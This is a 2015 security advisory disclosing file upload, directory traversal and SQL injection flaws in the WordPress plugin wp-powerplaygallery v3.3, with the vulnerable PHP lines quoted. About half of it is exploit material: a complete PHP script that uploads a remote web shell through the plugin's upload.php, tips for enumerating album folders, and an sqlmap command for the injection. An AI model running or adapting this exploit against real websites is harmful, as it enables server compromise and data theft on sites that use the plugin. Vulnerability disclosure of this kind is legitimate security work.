WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

`Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-27  
Download Site: https://wordpress.org/plugins/wp-powerplaygallery  
Vendor: WP SlideShow  
Vendor Notified: 2015-06-29  
Advisory: http://www.vapid.dhs.org/advisory.php?v=132  
Vendor Contact: [email protected]  
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.  
Vulnerability:  
1. Ability to create directories out side of the upload path by using ../:  
Lines 56-59 of upload.php:  
  
56 // Create target dir  
57 if (!file_exists($targetDir)) {  
58 @mkdir($targetDir);  
59 }   
  
2. Arbitrary file uploads to a path in the web root directory:  
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:  
  
138 // Open temp file  
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {  
140 die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');  
141 }  
142   
143 if (!empty($_FILES)) {  
144 if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {  
145 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}');  
146 }  
147   
148 // Read binary input stream and append it to temp file  
149 if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {  
150 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');  
151 }  
152 } else {  
153 if (!$in = @fopen("php://input", "rb")) {  
154 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');  
155 }  
156 }  
157   
158 while ($buff = fread($in, 4096)) {  
159 fwrite($out, $buff);  
160 }  
  
3. Sql injection   
Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are  
any GET/POST to albumid or name.  
  
131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, ` image`, `status`, `order`, `creation_date` )  
132 VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST ['name']."',1,'','NULL')";  
133   
134 $wpdb->query($query);  
135   
  
CVEID:  
OSVDB:  
Exploit Code:  
• <?php  
• /*Remote shell upload exploit for wp-powerplaygallery v3.3 */  
• /*Larry W. Cashdollar @_larry0  
• 6/27/2015  
• albumid needs to be a numeric value matching an existing album number, 1 is probably a good start  
• but you can enumerate these by using curl, and looking for redirect 301 responses:  
• e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big  
• ->301 exists else 404 doesn't.  
• shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php  
• */  
•   
•   
• $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';  
• $file_name_with_full_path = '/var/www/shell.php';  
•   
• echo "POST to $target_url $file_name_with_full_path";  
• $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);  
•   
• $ch = curl_init();  
• curl_setopt($ch, CURLOPT_URL,$target_url);  
• curl_setopt($ch, CURLOPT_POST,1);  
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);  
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
• $result=curl_exec ($ch);  
• curl_close ($ch);  
• echo "<hr>";  
• echo $result;  
• echo "<hr>";  
• ?>  
SQLi PoC:  
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1” —dbms mysql  
  
  
`